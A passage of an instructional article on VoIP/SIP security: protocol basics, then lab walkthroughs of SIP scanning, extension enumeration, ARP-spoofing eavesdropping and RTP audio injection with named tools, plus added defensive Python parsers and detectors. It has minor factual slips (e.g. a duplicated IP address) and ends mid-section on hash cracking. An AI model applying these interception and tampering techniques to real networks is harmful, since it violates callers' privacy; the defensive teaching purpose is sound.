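To make the jitter buffer behaviour concrete, here is an added Python example (written for this edit, not code from the article or from any tool it discusses) that decodes the fixed RTP header of RFC 3550 and reorders packets by sequence number, discarding duplicates and late packets and declaring a packet lost once a configurable number of later packets are already waiting. The packets are constructed inline (8 kHz G.711, 160 samples per 20 ms packet); the buffer depth and the SSRC value are assumptions of the example.

```python
import struct

RTP_HEADER_LEN = 12  # fixed header size, RFC 3550 section 5.1


def parse_rtp_header(packet: bytes) -> dict:
    """Decode the fixed 12-byte RTP header; CSRC list and extensions are not consumed."""
    if len(packet) < RTP_HEADER_LEN:
        raise ValueError("packet shorter than the fixed RTP header")
    first, second, seq, ts, ssrc = struct.unpack("!BBHII", packet[:RTP_HEADER_LEN])
    if first >> 6 != 2:
        raise ValueError("only RTP version 2 is supported")
    return {
        "marker": bool(second & 0x80),
        "payload_type": second & 0x7F,
        "seq": seq,
        "timestamp": ts,
        "ssrc": ssrc,
        "payload": packet[RTP_HEADER_LEN:],
    }


def build_rtp_packet(seq, ts, ssrc, payload_type=0, marker=False, payload=b"") -> bytes:
    """Constructed packet for the demo: version 2, no padding, extension or CSRCs."""
    first = 2 << 6
    second = (0x80 if marker else 0) | (payload_type & 0x7F)
    return struct.pack("!BBHII", first, second, seq & 0xFFFF, ts & 0xFFFFFFFF, ssrc) + payload


def seq_before(a: int, b: int) -> bool:
    """True when 16-bit sequence number a precedes b, allowing for wrap-around."""
    return a != b and ((b - a) & 0xFFFF) < 0x8000


class JitterBuffer:
    """Reorders packets by sequence number, discards duplicates and late packets,
    and declares a packet lost once `depth` later packets are already waiting."""

    def __init__(self, depth: int = 4):
        self.depth = depth
        self.pending = {}        # seq -> payload awaiting in-order release
        self.next_seq = None     # next sequence number owed to the decoder
        self.discarded = 0       # duplicates and packets that arrived after their slot
        self.lost = 0

    def push(self, packet: bytes) -> None:
        hdr = parse_rtp_header(packet)
        seq = hdr["seq"]
        if self.next_seq is None:
            self.next_seq = seq
        if seq in self.pending or seq_before(seq, self.next_seq):
            self.discarded += 1
            return
        self.pending[seq] = hdr["payload"]

    def pop_ready(self) -> list:
        """Release consecutive packets; skip a missing one only when the buffer is full."""
        released = []
        while self.pending:
            if self.next_seq in self.pending:
                released.append((self.next_seq, self.pending.pop(self.next_seq)))
            elif len(self.pending) >= self.depth:
                self.lost += 1     # gap: give up waiting for this sequence number
            else:
                break              # gap, but buffer not full: keep waiting
            self.next_seq = (self.next_seq + 1) & 0xFFFF
        return released


def replay(seqs, depth: int = 4):
    """Feed constructed packets with the given sequence numbers (timestamp advances
    160 samples per packet) and report (released seqs, discarded, lost)."""
    jb = JitterBuffer(depth)
    for s in seqs:
        jb.push(build_rtp_packet(s, ts=s * 160, ssrc=0x1234ABCD, payload=b"\xff" * 160))
    released = [seq for seq, _ in jb.pop_ready()]
    return released, jb.discarded, jb.lost


if __name__ == "__main__":
    print(replay([10, 11, 13, 12, 12, 14]))   # reordered arrival and one duplicate
    print(replay([20, 22, 23, 24, 25]))       # packet 21 never arrives
```

The second replay shows the trade-off the text describes: with a buffer depth of four, packet 21 is declared lost as soon as four later packets are queued, so playback continues with a small gap instead of stalling.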
Session Initiation Protocol (SIP)
SIP was developed by the SIP Working Group within the IETF; the protocol is published as IETF RFC
2543. SIP is a telephone signaling protocol used by VoIP in order to initiate, manage and terminate
voice sessions in Packet-Switched Networks. SIP sessions involve one or more participants and can use
either unicast or multicast communication. SIP is text-encoded and highly extensible, since it may be
extended to accommodate features and services such as call control services, mobility and interoperability
with existing telephony systems.
There are four types of logical SIP entities; each one participates in SIP communication as a client (the entity
which initiates Requests), as a server (the entity which responds to Requests), or as both. One network
device can have the functionality of more than one logical SIP entity. The four types of logical SIP
entities are:
1. USER AGENT (UA): initiates and terminates sessions by exchanging Requests and Responses. A UA is an
application which contains both a User Agent Client (UAC) and a User Agent Server (UAS). The UAC is a
client application that initiates SIP requests, while the UAS is a server application that contacts the user when
a SIP request is received and returns a response on behalf of the user. Devices with UA functions are:
workstations, IP phones, Media Gateways, call agents and automated answering services;
2. PROXY SERVER: an intermediary entity that acts as both a server and a client with the purpose of making
Requests on behalf of other clients. Requests are serviced either internally or by passing them on (possibly
after translation) to other servers. A proxy interprets and, when necessary, rewrites a Request message
before forwarding it;
3. REDIRECT SERVER: a server that accepts a SIP Request, maps the SIP address of the called party into
zero (if no address is known) or more new addresses and returns them to the client. It does not
pass the Request on to other servers;
4. REGISTRAR: accepts REGISTER Requests in order to update a location database with the contact
information of the user specified in the Request.
There are two types of SIP messages:
1. Request Messages: they are sent from the client to the server;
2. Response Messages: they are sent from the server to the client.
The Request Message types are:
INVITE: initiates a call; it can also change call parameters, in which case it is called a re-INVITE;
ACK: confirms a final response to the INVITE message;
BYE: used in order to terminate a call;
CANCEL: cancels searches and ringing;
OPTIONS: queries the capabilities of the other side;
REGISTER: used to register with the Location Service;
INFO: sends mid-session information that does not modify the session state.
Response Messages contain numeric codes; there are two types of responses and six classes. The
Response types are:
1. Provisional: its class is 1xx; this kind of response is used by the server to indicate progress,
but it cannot terminate a SIP transaction;
2. Final: its classes are 2xx, 3xx, 4xx, 5xx and 6xx; this kind of response terminates the SIP transaction.
The classes, divided by their prefix number, are:
1xx: provisional: searching, ringing and queuing. Two examples of these messages are 100 Continue and
180 Ringing;
2xx: success. An example is the message 200 OK;
3xx: redirection and forwarding. Examples are the messages 301 Moved Permanently and 302 Moved
Temporarily;
4xx: request failure due to client errors. The messages 400 Bad Request and 408 Request Time-Out are
two examples;
5xx: server failures;
6xx: global failure, such as busy, refusal or not available. The messages 600 Busy and 604 Does Not Exist
are two examples.
SIP messages are composed of three parts:
1. Start Line: each SIP message begins with this part. The Start Line conveys the message type (the method
type in Requests and the Response code in Responses) and the protocol version. The Start Line is either a
Request-line (in a Request message; it includes a Request-URI, which indicates the user or service to which
this request is being addressed, unlike the To field) or a Status-line (in a Response message; it holds the
numeric Status-code and its associated textual phrase);
Figure 2. Trivial SIP session
2. Header Fields: used to convey message attributes and to modify the message meaning. Just as an HTTP
request from a browser is made using a URL, SIP uses e-mail-like addresses whose typical format
is user/phone@domain/ip. Header fields can span multiple lines. Some SIP headers, such as Via, Contact, Route
and Record-Route, can appear multiple times in a message or, alternatively, can take multiple comma-
separated values in a single header occurrence;
3. Body: this is the content of the message and is used to describe the session to be initiated; it may include
audio and video codec types, sampling rates, etc. It may alternatively be used to carry opaque
textual or binary data of any type that relates in some way to the session. Message bodies can appear
both in Request and in Response Messages. Possible body types include the Session Description Protocol
(SDP) and Multipurpose Internet Mail Extensions (MIME).
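The three-part structure just described can be checked with a small parser. The following Python code is an added example, not part of the article, and the INVITE and 180 Ringing messages it parses are constructed for it using the test plant addresses of this article (the Call-ID, branch and tag values are placeholders). It distinguishes a Request-line from a Status-line, unfolds continued header lines, expands the compact header names of RFC 3261 section 7.3.3, collects the multi-valued headers (Via, Contact, Route, Record-Route) into lists, and bounds the body by Content-Length.

```python
import re

REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) (SIP/\d\.\d)$")
STATUS_LINE = re.compile(r"^(SIP/\d\.\d) (\d{3}) (.*)$")
# Headers that may occur several times or carry comma-separated lists of values.
MULTI_VALUE = {"via", "contact", "route", "record-route"}
# Compact header names (RFC 3261 section 7.3.3) mapped to their long form.
COMPACT = {"v": "via", "f": "from", "t": "to", "i": "call-id", "m": "contact",
           "c": "content-type", "l": "content-length", "s": "subject", "k": "supported"}


def parse_sip_message(raw: str) -> dict:
    """Split a SIP message into start line, header fields and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    msg = {"headers": {}}
    m = REQUEST_LINE.match(lines[0])
    if m:
        msg.update(kind="request", method=m.group(1), request_uri=m.group(2), version=m.group(3))
    else:
        m = STATUS_LINE.match(lines[0])
        if not m:
            raise ValueError(f"malformed start line: {lines[0]!r}")
        code = int(m.group(2))
        msg.update(kind="response", version=m.group(1), status=code,
                   reason=m.group(3), status_class=code // 100)
    # Unfold header lines: a line starting with whitespace continues the previous one.
    unfolded = []
    for line in lines[1:]:
        if line[:1] in (" ", "\t") and unfolded:
            unfolded[-1] += " " + line.strip()
        elif line:
            unfolded.append(line)
    for line in unfolded:
        name, sep, value = line.partition(":")
        if not sep:
            raise ValueError(f"malformed header line: {line!r}")
        name = name.strip().lower()
        name = COMPACT.get(name, name)
        value = value.strip()
        if name in MULTI_VALUE:
            # Naive split: a quoted display name containing a comma would be mis-split.
            msg["headers"].setdefault(name, []).extend(v.strip() for v in value.split(","))
        else:
            msg["headers"][name] = value
    # Content-Length, when present, bounds the body; anything beyond it is ignored.
    length = msg["headers"].get("content-length")
    msg["body"] = body[:int(length)] if length is not None else body
    return msg


def uri_user(address: str) -> str:
    """User part of a From/To/Request-URI value, e.g. '"Bob" <sip:1000@host>;tag=x' -> '1000'."""
    m = re.search(r"sips?:([^@;>]+)@", address)
    return m.group(1) if m else ""


# Constructed sample traffic, modelled on the test plant addresses used in this article.
SDP_BODY = "v=0\r\no=- 1 1 IN IP4 192.168.101.190\r\nm=audio 8000 RTP/AVP 0 8\r\n"
SAMPLE_INVITE = (
    "INVITE sip:1000@192.168.101.105 SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 192.168.101.190:5060;branch=z9hG4bK-example1\r\n"
    "Via: SIP/2.0/UDP 10.0.0.1:5060;branch=z9hG4bK-example0,\r\n"
    "  SIP/2.0/UDP 10.0.0.2:5060;branch=z9hG4bK-example2\r\n"
    "From: \"Caller\" <sip:1234@192.168.101.105>;tag=abc123\r\n"
    "To: <sip:1000@192.168.101.105>\r\n"
    "Call-ID: constructed-call-id@192.168.101.190\r\n"
    "CSeq: 1 INVITE\r\n"
    "c: application/sdp\r\n"
    f"Content-Length: {len(SDP_BODY)}\r\n"
    "\r\n" + SDP_BODY
)
SAMPLE_RINGING = "SIP/2.0 180 Ringing\r\nCSeq: 1 INVITE\r\nContent-Length: 0\r\n\r\n"

if __name__ == "__main__":
    invite = parse_sip_message(SAMPLE_INVITE)
    print(invite["method"], invite["request_uri"], invite["headers"]["via"])
    print(parse_sip_message(SAMPLE_RINGING)["status_class"])
```

The second Via header of the sample shows both mechanisms from point 2 above at once: a folded continuation line and a comma-separated pair of values, which the parser returns as separate list entries alongside the first Via.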
Figure 2 shows a trivial SIP session, captured by means of a Network Analyzer called Wireshark, that
reports an interaction between a UAC and a UAS which is established and then terminated. The UAC has IP
address 192.168.101.190 and the UAS has 192.168.101.105. In particular, packet 421 is an INVITE Request
Message sent to the user 1000. Then the Response Message packets 423 and 424, belonging to class 1xx,
signal respectively call continuation and the ring-back tone. After about 10 seconds the called user answers,
as stated by packet 647, which reports a Response Message OK belonging to the class 2xx; now the telephone
call is established. The telephone call lasts about 40 seconds, then the caller hangs up the telephone, as
stated by packet 4985, which reports a BYE Request Message in order to close the call.
Figure 3 reports the details of packet number 421, again captured by means of Wireshark. It is an
INVITE Request Message where Start Line, Header Fields and Body are clearly visible.
Overview of Common VoIP Attacks
In the following, an overview of common VoIP attacks is reported. Each attack is executed by means of a
dedicated hacking tool on a Linux OS platform. Before developing and explaining the attacks, let us have a look
at the test plant set up by the author in order to develop the VoIP exploitation examples.
Figure 3. SIP INVITE details
Test Plant Characteristics
A basic Local Area Network scenario was set up in order to execute and explain the VoIP attacks reported in
this article. The network devices and platforms involved in this test plant are:
UAS: Ubuntu 12.04.3 Server with Asterisk 1.6.2.24 PBX, IP address 192.168.101.105/24, UDP port
5060;
UAC #1: Ubuntu 12.04.3 Server with Zoiper softphone, IP address 192.168.101.105/24, UDP port
37268, extension 1000, authentication password: mypasswd1;
UAC #2: Windows 7 OS with X-Lite softphone, IP address 192.168.101.190/24, UDP port 5060, extension
1234, authentication password: youpasswd;
UAC #3: Linux Mint OS with ZoIPer softphone, IP address 192.168.101.108/24, UDP port 47723, extension
2000, authentication password: mypasswd2;
Attacker: Linux Black Ubuntu, IP address 192.168.101.191/24;
Network Device: DELL Switch 2748.
Information Gathering
In the previous section the features of the network devices were reported by the author in order to help the
reader understand the following examples, but in reality a network administrator would hide that
information in order to make any attack harder. So an attacker, relying on his own resources, must discover
all the information about the network before starting any kind of attack; this is always the first phase of
any attack and is called Information Gathering: the attacker gathers information about the network devices
in order to learn as much as he can. In particular the attacker could be interested in: network hosts,
network servers, PBX types and versions, VoIP Media Gateways, SIP client types and versions.
Several free tools could be used by an attacker to accomplish this task: SMAP, SIPSAK, SIPSCAN
and SVMAP. The author will use SVMAP, which belongs to a suite of SIP tools called SIPVICIOUS (other
tools of this suite will be treated in the following sections). Some SVMAP capabilities are:
scan, identify and fingerprint a single target IP, an IP range or even an entire subnetwork;
network interface and local port selection for outgoing packets;
identify SIP devices and PBX servers on default and non-default ports;
scan just one host on different ports, looking for a SIP service on that host, or multiple hosts on
multiple ports;
take previous scan results as input, allowing you to scan only known hosts running SIP;
use different scanning methods (OPTIONS, REGISTER, INVITE, etc.);
get all the phones on a network to ring at the same time (using INVITE as method);
randomly scan internet ranges;
resume previous scans.
SVMAP allows specifying the request method that will be used for scanning (by default the OPTIONS
method); a different method can be specified, such as REGISTER or INVITE (attention: the INVITE
method can be noisy and generate a ring at the other end). The usable methods are:
INVITE: a client is being invited to participate in a call session;
ACK: confirms that the client has received a final response to an INVITE request;
BYE: terminates a call and can be sent by either the caller or the callee;
CANCEL: deletes any pending request;
OPTIONS: queries the capabilities of servers;
REGISTER: registers the address listed in the To header field with a SIP server;
PRACK: provisional acknowledgement;
SUBSCRIBE: subscribes to an Event Notification from the Notifier;
NOTIFY: notify the subscriber of a new Event;
PUBLISH: publishes an event to the Server;
INFO: sends mid-session information that does not modify the session state;
REFER: asks recipient to issue SIP request (call transfer);
MESSAGE: transports instant messages using SIP;
UPDATE: modifies the state of the session without changing the state of the dialog.
Figure 4. Network Scanning with SVMAP
Furthermore SVMAP offers debug and verbosity options and allows scanning the SRV records for SIP on the
destination domain. SRV records are a type of DNS entry that specifies information on a service available in a
domain; typically they are used by clients who want to know the location of the service within a domain.
Figure 4 reports a scan of the entire network 192.168.101.0/24 executed by means of SVMAP with
fingerprinting enabled; as you can see in the picture, the scan has found three SIP client devices (two ZoIPer
softphones and an X-Lite softphone, as reported in the previous section) and one SIP server (the Asterisk PBX,
again as reported in the previous section). Notice that devices 105 and 108 are two UACs which open
non-default UDP SIP ports. This kind of scan does not use the default method REGISTER but INVITE instead,
which sends an INVITE SIP message to each scanned client; it is not a very silent method, since it causes one
ring on each UAC.
Since the countermeasures against Information Gathering are the same as those against Extensions
Enumeration, they will be reported in the next section.
Extensions Enumeration
Extensions Enumeration is an important VoIP attack used in order to identify the live SIP extensions.
SVWAR is a free SIP extension line scanner and it will be used by the author to accomplish this
kind of attack. SVWAR also belongs to the SIPVICIOUS suite and works similarly to traditional wardialers, by
guessing a range of extensions or a given list of extensions. Some SVWAR capabilities are:
identify extensions on PBXs and through SIP proxies;
scan for large ranges of numeric extensions;
scan for extensions using a file containing a list of possible extension names;
use different SIP request methods for scanning since not all PBX servers behave the same;
resume previous scans.
Figure 5. Extensions Enumeration with SVWAR
Figure 5 shows a scan for user extensions from 1000 to 1500 obtained with the default Request method
(REGISTER). As you can see in the picture, the result is the list of user extensions registered on the PBX, and
each UAC needs the authentication password in order to set up a call.
Avoiding Information Gathering and Extensions Enumeration is not an easy task: you cannot deny SIP
messages such as INVITE, OPTIONS, REGISTER, etc., since they are essential to set up a VoIP call; you
can only consider blocking these messages when they are received in rapid succession. Another countermeasure
that a network administrator could take is to set up a firewall on the UAS by means of Access Control
Lists (ACLs); in this way the UAS accepts only INVITEs sent by devices with trusted IP addresses.
Since ACLs do not prevent ARP spoofing and Caller ID spoofing attacks (they will be treated in the
following sections), in order to get stronger network protection the switches must be configured correctly:
all unused ports should be disabled and the used ports must be configured with the port-security option
in order to keep intruder devices out of the network.
Figure 6. Spoofing UAS with ARPSPOOF
Figure 7. Spoofing UAC#1 with ARPSPOOF
Eavesdropping
Eavesdropping is the act of secretly listening to the VoIP conversations of others without their consent; this
can be done by means of packet capture, which is the process of intercepting and logging traffic with
Network Analyzers.
As already reported in previous sections, a Network Analyzer is a computer program (such as Wireshark) or
a piece of hardware that can intercept and log traffic passing over a particular type of network,
such as Ethernet or wireless. As data streams flow across the network, the sniffer captures each
packet and, if needed, decodes it, showing the values of the various fields according to the appropriate
RFC or other specification. Packet capture can be used by attackers on VoIP networks in order to
capture SIP Requests and RTP data sent from the UAC to the UAS and back. In this section call eavesdropping is
obtained by means of a Man In the Middle (MITM) attack, which means that the attacker makes independent
connections with the victims and relays messages between them, making them believe that they are talking
directly to each other over a private connection, while the entire conversation is instead controlled by the
attacker. In order to become the MITM, the attacker can send fake (spoofed) Address Resolution Protocol
(ARP) messages on the Local Area Network (LAN); their aim is to associate the attacker's Media Access
Control (MAC) address with the IP address of the PBX, so that any traffic meant for that IP address is
sent to the attacker instead. This technique is called ARP spoofing.
Figures 6 and 7 report the ARP spoofing technique executed by the author by means of the ARPSPOOF tool: the
first figure reports the spoofing of the UAS (PBX) and the second the spoofing of UAC#1 (the Linux Mint
box). With these two commands the attacker spoofs the victim's MAC address and then sends Gratuitous ARP
(GARP) messages announcing the change to the UAS and to UAC#1. Once the commands are executed, the
ARP caches of the UAS and of UAC#1 are poisoned and all packets exchanged by the UAS and UAC#1 pass
through the attacker's Linux box; in this way the attacker can record an entire conversation.
Figure 8 reports a call trace between UAC#1 and the UAS obtained by means of Wireshark on the attacker's
Linux box; as you can see in the picture, a SIP handshake is followed by RTP traffic. Wireshark stores its
call traces in .pcap files (since it is developed by means of a library called libpcap) and provides a feature
that decodes and plays RTP voice packets; Figure 9 reports an example of this feature.
Figure 8. Man in the Middle Registration
One countermeasure against the eavesdropping attack is again to configure the network switch correctly,
using static ARP entries. Since static ARP is not always possible, another way to avoid this attack is to use
UAs on platforms that refuse GARP messages, for example Solaris OS.
Finally, the last countermeasure against eavesdropping is voice encryption: if the audio signal is encrypted
it cannot be understood. Voice encryption can be obtained by means of Secure RTP (SRTP), which is a
standard (RFC 3711) providing encryption and authentication of RTP.
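As an added example of the detection side of the static ARP countermeasure (this code is not from the article or from the ARPSPOOF tool), the following Python function reviews a sequence of ARP replies and raises an alert when an IP address moves to a different MAC, or when one MAC answers for several IP addresses, which is exactly the footprint that the two commands of Figures 6 and 7 leave in the ARP caches of the UAS and UAC#1. The replies, timestamps and MAC values are constructed for the example; when static bindings are supplied, the poisoned mapping is reported but never accepted.

```python
from collections import defaultdict


def detect_arp_spoofing(replies, static_bindings=None):
    """Review ARP replies given as (timestamp, sender IP, sender MAC) and report
    the two symptoms of the poisoning described above: an IP address whose MAC
    suddenly changes, and a single MAC answering for more than one IP address.
    `static_bindings` (ip -> mac) are entries that are reported on but never
    overwritten, the effect of the static ARP countermeasure.
    Returns (alerts, ip_to_mac_table)."""
    static_bindings = {ip: mac.lower() for ip, mac in (static_bindings or {}).items()}
    table = dict(static_bindings)               # ip -> mac currently believed
    ips_per_mac = defaultdict(set)              # mac -> every IP it has claimed
    for ip, mac in table.items():
        ips_per_mac[mac].add(ip)
    reported_macs = set()
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        known = table.get(ip)
        if known is not None and known != mac:
            alerts.append(f"{ts} {ip} moved from {known} to {mac}")
        if ip not in static_bindings:
            table[ip] = mac                     # dynamic entry: learn the new mapping
        ips_per_mac[mac].add(ip)
        if len(ips_per_mac[mac]) > 1 and mac not in reported_macs:
            reported_macs.add(mac)
            alerts.append(f"{ts} {mac} claims {sorted(ips_per_mac[mac])}")
    return alerts, table


# Constructed replies (timestamps and MACs are made up for the example): normal
# traffic first, then the host at .191 announcing itself as both the PBX (.105)
# and UAC#1 (.108), the effect of the two ARPSPOOF commands in Figures 6 and 7.
SAMPLE_REPLIES = [
    ("10:00:00", "192.168.101.105", "00:11:22:33:44:05"),
    ("10:00:00", "192.168.101.108", "00:11:22:33:44:08"),
    ("10:00:01", "192.168.101.191", "00:11:22:33:44:91"),
    ("10:00:05", "192.168.101.105", "00:11:22:33:44:91"),
    ("10:00:05", "192.168.101.108", "00:11:22:33:44:91"),
]

if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_REPLIES)[0]:
        print(alert)
```

Run without static bindings the table ends up poisoned exactly as the victims' caches do; with a static entry for the PBX the same alerts are raised but the PBX mapping is kept, which is the protection the text attributes to static ARP.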
Telephone Tampering
Another attack that can be performed by means of MITM is Telephone Tampering; it is a form of sabotage
consisting of the intentional modification of the carried signal in a way that makes it harmful to the
user. RTP is the media protocol which makes VoIP vulnerable to tampering: RTP is often sent unencrypted
and runs over an insecure transport protocol, UDP.
An attacker can capture an RTP packet (by means of a MITM attack) and create RTP packets similar to the
original but with a greater timestamp and sequence number. In this way the attacker can trick the victim
endpoint into rejecting the RTP messages from the legitimate endpoint in favor of the injected packets, since
the original packets appear old. As the injected packets carry a valid and unchanged SSRC (the synchronization
source identifier that characterizes the current session), they are accepted as part of the original transmission.
Telephone Tampering can have very serious consequences, because caller and called party consider themselves
trusted parties.
Figure 9. Wireshark Player
Figure 10 shows an example of the Telephone Tampering attack obtained by means of the RTPINSERTSOUND
tool, which can be used to inject a .wav file (selected by the attacker) into the RTP stream, replacing the voice
signal from one side with the signal contained in the .wav audio file.
Figure 10. Telephone Tampering with RTPINSERTSOUND
where:
-v stands for verbose output;
-i eth0 is the selected interface;
-a is the source IPv4 address;
-A is the source UDP port;
-b is the victim IPv4 address;
-B is the destination UDP port;
-f is the spoof factor;
-j is the jitter factor.
Figure 11 reports the help output of another tool used by attackers in order to perform Telephone
Tampering, called RTPMIXSOUND. A countermeasure against tampering is again voice encryption. Moreover, a
VoIP/SIP firewall could be placed in front of all the VoIP phones to monitor incoming and outgoing RTP,
detecting audio insertion/mixing attacks.
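The packet pattern described above (same SSRC, timestamp and sequence number jumping ahead, legitimate packets then arriving with stale numbers) can be recognized on the receiving endpoint or on a monitoring probe such as the VoIP firewall just mentioned. The following Python example is added here and is not code from the article or from RTPINSERTSOUND: it tracks per-SSRC sequence and timestamp progression and reports a forward jump larger than reordering can explain, a timestamp that does not grow with the sequence number, and stale packets that keep arriving behind an already-advanced position. The RTP stream it analyses is constructed inline with a silent G.711 payload; the jump threshold of 50 packets, the 160 samples per packet and the SSRC value are assumed values.

```python
import struct


def rtp_fields(packet: bytes):
    """Return (ssrc, sequence number, timestamp) from the fixed RTP header."""
    _, _, seq, ts, ssrc = struct.unpack("!BBHII", packet[:12])
    return ssrc, seq, ts


def detect_rtp_injection(packets, samples_per_packet=160, max_jump=50):
    """Track each SSRC's last accepted sequence number and timestamp and flag
    (a) a forward jump far larger than network reordering explains,
    (b) timestamp growth that does not match the sequence growth, and
    (c) packets far behind the accepted position, i.e. a second sender still
    numbering from the old position under the same SSRC.
    Returns a list of (packet index, ssrc, seq, reason)."""
    last = {}            # ssrc -> (seq, ts) of the last accepted packet
    findings = []
    for index, packet in enumerate(packets):
        ssrc, seq, ts = rtp_fields(packet)
        if ssrc not in last:
            last[ssrc] = (seq, ts)
            continue
        prev_seq, prev_ts = last[ssrc]
        dseq = (seq - prev_seq) & 0xFFFF          # modular forward distance
        dts = (ts - prev_ts) & 0xFFFFFFFF
        if dseq >= 0x8000:                        # behind the accepted position
            if 0x10000 - dseq > max_jump:
                findings.append((index, ssrc, seq, "stale packet, possible interleaved sender"))
            continue                              # never move the position backwards
        reasons = []
        if dseq > max_jump:
            reasons.append("sequence jump of %d" % dseq)
        if abs(dts - dseq * samples_per_packet) > samples_per_packet:
            reasons.append("timestamp inconsistent with sequence")
        for reason in reasons:
            findings.append((index, ssrc, seq, reason))
        last[ssrc] = (seq, ts)
    return findings


def make_packet(seq, ts, ssrc=0x5E55ABCD, payload_type=0):
    """Constructed RTP packet (version 2, no padding/extension/CSRC) with a silent G.711 payload."""
    return struct.pack("!BBHII", 2 << 6, payload_type, seq & 0xFFFF, ts & 0xFFFFFFFF, ssrc) + b"\xff" * 160


def demo_stream():
    """Legitimate packets 100..104, then two packets about 1000 positions ahead
    (the injection pattern described above), then the genuine sender's next packet."""
    ts0 = 16000
    stream = [make_packet(100 + k, ts0 + 160 * k) for k in range(5)]
    stream += [make_packet(1100, ts0 + 160 * 1000), make_packet(1101, ts0 + 160 * 1001)]
    stream.append(make_packet(105, ts0 + 160 * 5))
    return detect_rtp_injection(stream)


if __name__ == "__main__":
    for finding in demo_stream():
        print(finding)
```

The stale-packet rule is what separates injection from ordinary reordering: a packet that is a few positions late is normal jitter, while a whole second stream numbered hundreds of positions behind the accepted one means two senders share the SSRC.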
Authentication Attacks
In the past SIP used weak authentication where the password was sent in plain text, making it easy to obtain
for anyone who could get access to the SIP messages. Since this authentication was insecure it was deprecated
and now, in SIP 2.0, the MD5 message-digest algorithm is used to hash the UAC password. When a UAC
wants to authenticate with a UAS, the UAS generates and sends a digest challenge to the UAC. The simplest
authentication challenge that a UAS can send contains a Realm (used to identify the credentials within a SIP
message; usually it is the SIP domain) and a Nonce (a unique MD5 string generated by the UAS for each
registration request; it is made from a time stamp and a secret phrase to ensure a limited lifetime, and it
cannot be used again), as in the following:
WWW-Authenticate: Digest algorithm=MD5, realm="asterisk", nonce="3cf75870"
Once the UAC receives the digest challenge and the user enters his credentials, the client uses the nonce to
generate a digest response and sends it back to the server:
Authorization: Digest username="1234", realm="asterisk", nonce="3cf75870", uri="sip:1000@192.168.101.105", response="cf89107228a444c1e8b761dfb6e669e4", algorithm=MD5
The UAS then performs the same computation to arrive at its own MD5 hash and, if it matches the one
supplied by the UAC, the UAS responds with a 200 OK message and the UAC is authenticated.
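To show what the UAS computes when it checks the Authorization header above, here is an added Python example (not code from the article, from Asterisk or from any tool it names) implementing the RFC 2617 digest without qop, the form shown in the header: response = MD5(MD5(username:realm:password):nonce:MD5(method:uri)). The nonce is built from a time stamp and a server secret, as the text describes, so its freshness can be verified without server state. Going beyond the text, the check also requires the From header's user to match the authenticated username, which is the authentication of the From header that the Caller ID spoofing section of this article calls for. The server secret, the password of extension 1234 and the nonce lifetime are constructed values of the example.

```python
import hashlib
import hmac
import re

NONCE_LIFETIME = 300   # seconds a challenge stays valid (assumed policy value)


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def issue_nonce(server_secret: str, now: float) -> str:
    """Nonce = '<timestamp>.<MD5(timestamp:secret)>': the UAS can later check it
    without keeping state, and its lifetime is bounded by the embedded time stamp."""
    stamp = str(int(now))
    return stamp + "." + md5_hex(stamp + ":" + server_secret)


def nonce_is_fresh(nonce: str, server_secret: str, now: float) -> bool:
    stamp, sep, tag = nonce.partition(".")
    if not sep or not stamp.isdigit():
        return False
    if not hmac.compare_digest(tag, md5_hex(stamp + ":" + server_secret)):
        return False                                     # not issued by this server
    return 0 <= now - int(stamp) <= NONCE_LIFETIME


def digest_response(username, realm, password, method, uri, nonce) -> str:
    """RFC 2617 digest without qop, the form used in the Authorization header above."""
    ha1 = md5_hex(f"{username}:{realm}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")
    return md5_hex(f"{ha1}:{nonce}:{ha2}")


def parse_digest_header(value: str) -> dict:
    """Turn 'Digest k="v", k2=v2, ...' into a dict with the quotes removed."""
    scheme, _, params = value.strip().partition(" ")
    if scheme.lower() != "digest":
        raise ValueError("not a Digest credential")
    return {k: v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|[^,\s]+)', params)}


def verify_request(authorization, from_header, method, realm, users, server_secret, now):
    """Server-side check of an Authorization header; `users` maps username -> password
    (a real registrar would store HA1 instead of the clear password).
    Returns (accepted, reason)."""
    try:
        creds = parse_digest_header(authorization)
    except ValueError as exc:
        return False, str(exc)
    for field in ("username", "realm", "nonce", "uri", "response"):
        if field not in creds:
            return False, f"missing {field}"
    if creds.get("algorithm", "MD5").upper() != "MD5":
        return False, "unsupported algorithm"
    if creds["realm"] != realm:
        return False, "wrong realm"
    if not nonce_is_fresh(creds["nonce"], server_secret, now):
        return False, "stale nonce"                      # expired or forged challenge
    password = users.get(creds["username"])
    if password is None:
        return False, "unknown user"
    expected = digest_response(creds["username"], realm, password, method, creds["uri"], creds["nonce"])
    if not hmac.compare_digest(expected, creds["response"]):
        return False, "bad response"
    # Beyond the article's text: the From identity must be the one that proved the credential.
    m = re.search(r"sips?:([^@;>]+)@", from_header)
    if not m or m.group(1) != creds["username"]:
        return False, "From identity does not match authenticated user"
    return True, "ok"


# Constructed values for the example: server secret and the password of extension 1234.
SERVER_SECRET = "constructed-server-secret"
USERS = {"1234": "constructed-password"}


def sample_exchange(password="constructed-password", issued_at=1_700_000_000,
                    checked_at=None, from_user="1234"):
    """Client side: answer a challenge issued at `issued_at` for INVITE sip:1000@...;
    server side: verify it at `checked_at`. Returns (accepted, reason)."""
    checked_at = issued_at if checked_at is None else checked_at
    nonce = issue_nonce(SERVER_SECRET, issued_at)
    uri = "sip:1000@192.168.101.105"
    response = digest_response("1234", "asterisk", password, "INVITE", uri, nonce)
    authorization = (f'Digest username="1234", realm="asterisk", nonce="{nonce}", '
                     f'uri="{uri}", response="{response}", algorithm=MD5')
    from_header = f'"Caller" <sip:{from_user}@192.168.101.105>;tag=constructed'
    return verify_request(authorization, from_header, "INVITE", "asterisk",
                          USERS, SERVER_SECRET, checked_at)


if __name__ == "__main__":
    print(sample_exchange())
    print(sample_exchange(checked_at=1_700_000_000 + 600))
```

The nonce check is what limits the damage of the replay scenario implied by the text: a captured Authorization header stops validating once the embedded time stamp ages past the lifetime, and a nonce the server never issued fails the tag comparison.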
Figure 11. RTPMIXSOUND help command
Figure 12. SIPDUMP use example
Figure 13. SIPDUMP Hash values
Even hashed passwords might not be safe enough to protect against Authentication Attacks, since it is
possible to crack an MD5 hash, especially when short or too simple passwords are used: an attacker could
